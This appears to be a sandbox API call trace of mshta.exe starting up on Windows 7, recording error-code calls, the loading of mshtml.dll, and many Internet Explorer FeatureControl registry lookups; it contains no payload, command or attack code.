[0068.617] SetLastError (dwErrCode=0x0)
[0068.617] GetLastError () returned 0x0
[0068.617] SetLastError (dwErrCode=0x0)
[0068.617] GetLastError () returned 0x0
[0068.617] SetLastError (dwErrCode=0x0)
[0068.617] GetLastError () returned 0x0
[0068.617] SetLastError (dwErrCode=0x0)
[0068.617] GetLastError () returned 0x0
[0068.617] SetLastError (dwErrCode=0x0)
[0068.617] GetLastError () returned 0x0
[0068.617] SetLastError (dwErrCode=0x0)
[0068.617] GetLastError () returned 0x0
[0068.617] SetLastError (dwErrCode=0x0)
[0068.617] GetLastError () returned 0x0
[0068.617] SetLastError (dwErrCode=0x0)
[0068.617] GetLastError () returned 0x0
[0068.617] SetLastError (dwErrCode=0x0)
[0068.617] GetLastError () returned 0x0
[0068.617] SetLastError (dwErrCode=0x0)
[0068.618] GetLastError () returned 0x0
[0068.618] SetLastError (dwErrCode=0x0)
[0068.618] GetLastError () returned 0x0
[0068.618] SetLastError (dwErrCode=0x0)
[0068.618] GetLastError () returned 0x0
[0068.618] SetLastError (dwErrCode=0x0)
[0068.618] GetLastError () returned 0x0
[0068.618] SetLastError (dwErrCode=0x0)
[0068.618] GetLastError () returned 0x0
[0068.618] SetLastError (dwErrCode=0x0)
[0068.618] GetLastError () returned 0x0
[0068.618] SetLastError (dwErrCode=0x0)
[0068.618] GetLastError () returned 0x0
[0068.618] SetLastError (dwErrCode=0x0)
[0068.618] GetLastError () returned 0x0
[0068.618] SetLastError (dwErrCode=0x0)
[0068.618] GetLastError () returned 0x0
[0068.618] SetLastError (dwErrCode=0x0)
[0068.618] GetLastError () returned 0x0
[0068.619] SetLastError (dwErrCode=0x0)
[0068.619] GetLastError () returned 0x0
[0068.619] SetLastError (dwErrCode=0x0)
[0068.619] GetLastError () returned 0x0
[0068.619] SetLastError (dwErrCode=0x0)
[0068.619] GetLastError () returned 0x0
[0068.619] SetLastError (dwErrCode=0x0)
[0068.619] GetLastError () returned 0x0
[0068.619] SetLastError (dwErrCode=0x0)
[0068.619] GetLastError () returned 0x0
[0068.619] SetLastError (dwErrCode=0x0)
[0068.619] GetLastError () returned 0x0
[0068.619] SetLastError (dwErrCode=0x0)
[0068.619] GetLastError () returned 0x0
[0068.619] SetLastError (dwErrCode=0x0)
[0068.619] GetLastError () returned 0x0
[0068.619] SetLastError (dwErrCode=0x0)
[0068.619] GetLastError () returned 0x0
[0068.620] SetLastError (dwErrCode=0x0)
[0068.620] GetLastError () returned 0x0
[0068.620] SetLastError (dwErrCode=0x0)
[0068.620] GetLastError () returned 0x0
[0068.620] SetLastError (dwErrCode=0x0)
[0068.620] GetLastError () returned 0x0
[0068.620] SetLastError (dwErrCode=0x0)
[0068.620] GetLastError () returned 0x0
[0068.620] SetLastError (dwErrCode=0x0)
[0068.620] GetLastError () returned 0x0
[0068.620] SetLastError (dwErrCode=0x0)
[0068.620] GetLastError () returned 0x0
[0068.620] SetLastError (dwErrCode=0x0)
[0068.620] GetLastError () returned 0x0
[0068.620] SetLastError (dwErrCode=0x0)
[0068.620] GetLastError () returned 0x0
[0068.620] SetLastError (dwErrCode=0x0)
[0068.620] GetLastError () returned 0x0
[0068.621] SetLastError (dwErrCode=0x0)
[0068.621] GetLastError () returned 0x0
[0068.621] SetLastError (dwErrCode=0x0)
[0068.621] GetLastError () returned 0x0
[0068.621] SetLastError (dwErrCode=0x0)
[0068.621] GetLastError () returned 0x0
[0068.621] SetLastError (dwErrCode=0x0)
[0068.621] GetLastError () returned 0x0
[0068.621] SetLastError (dwErrCode=0x0)
[0068.621] GetLastError () returned 0x0
[0068.621] SetLastError (dwErrCode=0x0)
[0068.621] GetLastError () returned 0x0
[0068.621] SetLastError (dwErrCode=0x0)
[0068.621] GetLastError () returned 0x0
[0068.621] SetLastError (dwErrCode=0x0)
[0068.621] GetLastError () returned 0x0
[0068.621] SetLastError (dwErrCode=0x0)
[0068.621] GetLastError () returned 0x0
[0068.622] SetLastError (dwErrCode=0x0)
[0068.622] GetLastError () returned 0x0
[0068.622] SetLastError (dwErrCode=0x0)
[0068.622] GetLastError () returned 0x0
[0068.622] SetLastError (dwErrCode=0x0)
[0068.622] GetLastError () returned 0x0
[0068.622] SetLastError (dwErrCode=0x0)
[0068.622] GetLastError () returned 0x0
[0068.622] SetLastError (dwErrCode=0x0)
[0068.622] GetLastError () returned 0x0
[0068.622] SetLastError (dwErrCode=0x0)
[0068.622] GetLastError () returned 0x0
[0068.622] SetLastError (dwErrCode=0x0)
[0068.622] GetLastError () returned 0x0
[0068.622] SetLastError (dwErrCode=0x0)
[0068.622] GetLastError () returned 0x0
[0068.622] SetLastError (dwErrCode=0x0)
[0068.622] GetLastError () returned 0x0
[0068.623] SetLastError (dwErrCode=0x0)
[0068.623] GetLastError () returned 0x0
[0068.623] SetLastError (dwErrCode=0x0)
[0068.623] GetLastError () returned 0x0
[0068.623] SetLastError (dwErrCode=0x0)
[0068.623] GetLastError () returned 0x0
[0068.623] SetLastError (dwErrCode=0x0)
[0068.623] GetLastError () returned 0x0
[0068.623] SetLastError (dwErrCode=0x0)
[0068.623] GetLastError () returned 0x0
[0068.623] SetLastError (dwErrCode=0x0)
[0068.623] GetLastError () returned 0x0
[0068.623] SetLastError (dwErrCode=0x0)
[0068.623] GetLastError () returned 0x0
[0068.623] SetLastError (dwErrCode=0x0)
[0068.623] GetLastError () returned 0x0
[0068.623] SetLastError (dwErrCode=0x0)
[0068.623] GetLastError () returned 0x0
[0068.623] SetLastError (dwErrCode=0x0)
[0068.623] GetLastError () returned 0x0
[0068.624] SetLastError (dwErrCode=0x0)
[0068.624] GetLastError () returned 0x0
[0068.625] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x682aef) returned 0x0
[0068.625] GetLastError () returned 0x0
[0068.625] GetVersion () returned 0x1db10106
[0068.625] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76220000
[0068.625] GetProcAddress (hModule=0x76220000, lpProcName="HeapSetInformation") returned 0x76235651
[0068.625] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0068.625] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x33fabc | out: phkResult=0x33fabc*=0x42) returned 0x0
[0068.626] RegQueryValueExA (in: hKey=0x42, lpValueName=0x0, lpReserved=0x0, lpType=0x33fab4, lpData=0x171e00, lpcbData=0x33fab0*=0x105 | out: lpType=0x33fab4*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x33fab0*=0x1f) returned 0x0
[0068.626] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x74790000
[0070.948] GetVersion () returned 0x1db10106
[0070.948] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76220000
[0070.948] GetProcAddress (hModule=0x76220000, lpProcName="HeapSetInformation") returned 0x76235651
[0070.948] HeapSetInformation (HeapHandle=0x820000, HeapInformationClass=0x0, HeapInformation=0x33f748, HeapInformationLength=0x4) returned 1
[0070.949] GetVersion () returned 0x1db10106
[0070.950] GetVersionExA (in: lpVersionInformation=0x33f620*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33f620*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0070.950] __dllonexit () returned 0x749b717c
[0070.950] __dllonexit () returned 0x749b73bd
[0070.950] __dllonexit () returned 0x749b7435
[0070.950] __dllonexit () returned 0x749b6e75
[0070.950] __dllonexit () returned 0x749b6ff5
[0070.950] __dllonexit () returned 0x749b71be
[0070.951] __dllonexit () returned 0x749b72e2
[0070.951] __dllonexit () returned 0x749b7320
[0070.951] __dllonexit () returned 0x749b7370
[0070.951] __dllonexit () returned 0x749b6e53
[0070.951] __dllonexit () returned 0x749b6e66
[0070.951] __dllonexit () returned 0x749b6a3e
[0070.951] __dllonexit () returned 0x749b6a46
[0070.951] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc1cb
[0070.951] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc1cb
[0070.951] __dllonexit () returned 0x749b6a60
[0070.951] __dllonexit () returned 0x749b6a7a
[0070.951] __dllonexit () returned 0x749b6a93
[0070.951] __dllonexit () returned 0x749b6aa7
[0070.951] __dllonexit () returned 0x749b6ac1
[0070.951] __dllonexit () returned 0x749b71f1
[0070.952] __dllonexit () returned 0x749b6ad0
[0070.952] __dllonexit () returned 0x749b6adf
[0070.952] __dllonexit () returned 0x749b6aee
[0070.952] __dllonexit () returned 0x749b6afd
[0070.952] __dllonexit () returned 0x749b6b0d
[0070.952] __dllonexit () returned 0x749b720c
[0070.952] __dllonexit () returned 0x749b6b1c
[0070.952] __dllonexit () returned 0x749b6b2f
[0070.952] __dllonexit () returned 0x749b6b49
[0070.952] __dllonexit () returned 0x749b6b58
[0070.952] __dllonexit () returned 0x749b6b67
[0070.952] __dllonexit () returned 0x749b6b76
[0070.952] __dllonexit () returned 0x749b6b85
[0070.952] __dllonexit () returned 0x749b6b94
[0070.952] __dllonexit () returned 0x749b6ba3
[0070.953] __dllonexit () returned 0x749b6bb2
[0070.953] __dllonexit () returned 0x749b6bc1
[0070.953] __dllonexit () returned 0x749b6bd0
[0070.953] __dllonexit () returned 0x749b6bdf
[0070.953] __dllonexit () returned 0x749b6bee
[0070.953] __dllonexit () returned 0x749b6bfd
[0070.953] __dllonexit () returned 0x749b6c0c
[0070.953] __dllonexit () returned 0x749b6c1b
[0070.953] __dllonexit () returned 0x749b6c2a
[0070.953] __dllonexit () returned 0x749b6c3d
[0070.953] __dllonexit () returned 0x749b6c4c
[0070.953] __dllonexit () returned 0x749b6c5b
[0070.953] __dllonexit () returned 0x749b6c75
[0070.953] __dllonexit () returned 0x749b6c8f
[0070.953] __dllonexit () returned 0x749b6ca9
[0070.954] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0070.954] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0070.954] __dllonexit () returned 0x749b6cb1
[0070.954] __dllonexit () returned 0x749b7294
[0070.954] __dllonexit () returned 0x749b6ccb
[0070.954] __dllonexit () returned 0x749b6cd3
[0070.954] __dllonexit () returned 0x749b6ce2
[0070.954] __dllonexit () returned 0x749b6cf1
[0070.954] __dllonexit () returned 0x749b6d00
[0070.954] __dllonexit () returned 0x749af72d
[0070.954] __dllonexit () returned 0x749b6d43
[0070.954] __dllonexit () returned 0x749b6d56
[0070.954] __dllonexit () returned 0x749af095
[0070.955] __dllonexit () returned 0x749b6d65
[0070.955] __dllonexit () returned 0x749b6d78
[0070.955] __dllonexit () returned 0x749b6d87
[0070.955] __dllonexit () returned 0x749b6d9a
[0070.955] __dllonexit () returned 0x749b2256
[0070.955] __dllonexit () returned 0x749b679d
[0070.955] __dllonexit () returned 0x749b6dd5
[0070.955] __dllonexit () returned 0x749b6df8
[0070.955] __dllonexit () returned 0x749b6e07
[0070.955] __dllonexit () returned 0x749b76cb
[0070.955] __dllonexit () returned 0x749b6e1a
[0070.955] __dllonexit () returned 0x749b72aa
[0070.956] __dllonexit () returned 0x749b72cb
[0070.956] __dllonexit () returned 0x749b6e3a
[0070.956] GetCurrentThreadId () returned 0xbf4
[0070.956] CoCreateGuid (in: pguid=0x74ccad20 | out: pguid=0x74ccad20*(Data1=0xee198dfd, Data2=0xfac6, Data3=0x4792, Data4=([0]=0x80, [1]=0xeb, [2]=0xd3, [3]=0xe2, [4]=0x5f, [5]=0x5e, [6]=0x82, [7]=0xaf))) returned 0x0
[0070.957] __dllonexit () returned 0x749b733d
[0070.957] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33f0c0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0070.957] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe"
[0070.957] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4
[0070.957] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8
[0070.957] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x83ebc0
[0070.957] SHRegGetValueW () returned 0x2
[0070.958] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f30c | out: phkResult=0x33f30c*=0x0) returned 0x2
[0070.958] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f308 | out: phkResult=0x33f308*=0x0) returned 0x2
[0070.958] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x94) returned 0x0
[0070.958] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x98) returned 0x0
[0070.959] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.961] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.961] RegCloseKey (hKey=0x0) returned 0x6
[0070.961] RegCloseKey (hKey=0x0) returned 0x6
[0070.961] RegCloseKey (hKey=0x94) returned 0x0
[0070.961] RegCloseKey (hKey=0x98) returned 0x0
[0070.961] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x98) returned 0x0
[0070.961] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x94) returned 0x0
[0070.961] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.961] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.961] RegCloseKey (hKey=0x0) returned 0x6
[0070.961] RegCloseKey (hKey=0x0) returned 0x6
[0070.961] RegCloseKey (hKey=0x98) returned 0x0
[0070.961] RegCloseKey (hKey=0x94) returned 0x0
[0070.961] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x94) returned 0x0
[0070.961] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x98) returned 0x0
[0070.962] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.962] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.962] RegCloseKey (hKey=0x0) returned 0x6
[0070.962] RegCloseKey (hKey=0x0) returned 0x6
[0070.962] RegCloseKey (hKey=0x94) returned 0x0
[0070.962] RegCloseKey (hKey=0x98) returned 0x0
[0070.962] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x98) returned 0x0
[0070.962] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x94) returned 0x0
[0070.962] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.962] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x9c) returned 0x0
[0070.962] SHRegGetValueW () returned 0x2
[0070.962] SHRegGetValueW () returned 0x2
[0070.962] RegCloseKey (hKey=0x9c) returned 0x0
[0070.962] RegCloseKey (hKey=0x0) returned 0x6
[0070.962] RegCloseKey (hKey=0x0) returned 0x6
[0070.962] RegCloseKey (hKey=0x98) returned 0x0
[0070.962] RegCloseKey (hKey=0x94) returned 0x0
[0070.962] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x94) returned 0x0
[0070.963] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x98) returned 0x0
[0070.963] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.963] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.963] RegCloseKey (hKey=0x0) returned 0x6
[0070.963] RegCloseKey (hKey=0x0) returned 0x6
[0070.963] RegCloseKey (hKey=0x94) returned 0x0
[0070.963] RegCloseKey (hKey=0x98) returned 0x0
[0070.963] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x98) returned 0x0
[0070.963] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x94) returned 0x0
[0070.963] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.963] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.963] RegCloseKey (hKey=0x0) returned 0x6
[0070.963] RegCloseKey (hKey=0x0) returned 0x6
[0070.963] RegCloseKey (hKey=0x98) returned 0x0
[0070.963] RegCloseKey (hKey=0x94) returned 0x0
[0070.964] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x94) returned 0x0
[0070.964] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x98) returned 0x0
[0070.964] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.964] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.964] RegCloseKey (hKey=0x0) returned 0x6
[0070.964] RegCloseKey (hKey=0x0) returned 0x6
[0070.964] RegCloseKey (hKey=0x94) returned 0x0
[0070.964] RegCloseKey (hKey=0x98) returned 0x0
[0070.964] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x98) returned 0x0
[0070.964] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x94) returned 0x0
[0070.964] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.965] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.965] RegCloseKey (hKey=0x0) returned 0x6
[0070.965] RegCloseKey (hKey=0x0) returned 0x6
[0070.965] RegCloseKey (hKey=0x98) returned 0x0
[0070.965] RegCloseKey (hKey=0x94) returned 0x0
[0070.965] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x94) returned 0x0
[0070.965] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x98) returned 0x0
[0070.965] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.965] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.965] RegCloseKey (hKey=0x0) returned 0x6
[0070.965] RegCloseKey (hKey=0x0) returned 0x6
[0070.965] RegCloseKey (hKey=0x94) returned 0x0
[0070.965] RegCloseKey (hKey=0x98) returned 0x0
[0070.965] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x98) returned 0x0
[0070.966] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x94) returned 0x0
[0070.966] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.966] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.966] RegCloseKey (hKey=0x0) returned 0x6
[0070.966] RegCloseKey (hKey=0x0) returned 0x6
[0070.966] RegCloseKey (hKey=0x98) returned 0x0
[0070.966] RegCloseKey (hKey=0x94) returned 0x0
[0070.966] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x94) returned 0x0
[0070.966] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x98) returned 0x0
[0070.966] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.966] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.967] RegCloseKey (hKey=0x0) returned 0x6
[0070.967] RegCloseKey (hKey=0x0) returned 0x6
[0070.967] RegCloseKey (hKey=0x94) returned 0x0
[0070.967] RegCloseKey (hKey=0x98) returned 0x0
[0070.967] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x98) returned 0x0
[0070.967] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x94) returned 0x0
[0070.967] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.967] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.967] RegCloseKey (hKey=0x0) returned 0x6
[0070.967] RegCloseKey (hKey=0x0) returned 0x6
[0070.967] RegCloseKey (hKey=0x98) returned 0x0
[0070.967] RegCloseKey (hKey=0x94) returned 0x0
[0070.967] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0070.969] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x98) returned 0x0
[0070.969] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x9c) returned 0x0
[0070.969] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.969] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.969] RegCloseKey (hKey=0x0) returned 0x6
[0070.969] RegCloseKey (hKey=0x0) returned 0x6
[0070.969] RegCloseKey (hKey=0x98) returned 0x0
[0070.969] RegCloseKey (hKey=0x9c) returned 0x0
[0070.970] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x9c) returned 0x0
[0070.970] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x98) returned 0x0
